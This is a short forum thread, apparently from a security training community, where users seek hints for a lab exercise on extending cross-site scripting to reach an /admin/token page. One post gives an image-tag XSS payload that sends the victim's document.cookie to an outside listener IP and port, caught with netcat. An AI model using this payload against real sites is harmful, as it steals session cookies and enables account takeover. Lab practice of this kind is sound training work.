Forum Discussion
shubham
Bronze I
10 months agoCross-Site Scripting: Ep.6 – Further Exploitation
I was stuck in one question looking for HINT. Extend the XSS vulnerability to view the contents of the /admin/token page with SSRF.
- 9 months ago
johndoe321I changed the script to a different port to the one being bombarded and did another NC listener on that different port. Roled right in.
KieranRowley
Community Manager
10 months agoHi shubham welcome to The Human Connection!
Please can you provide some detail of the steps you have already taken so that your fellow community members are able to assist you?
shubham
Bronze I
10 months agoThanks for welcome.
So I tire using netcat with the payload in message to make a reverse connection
Payload:<img src=xss onload="this.src='http://10.102.181.168:5556/admin/token?'+document.cookie;this.removeAttribute('onerror');"/>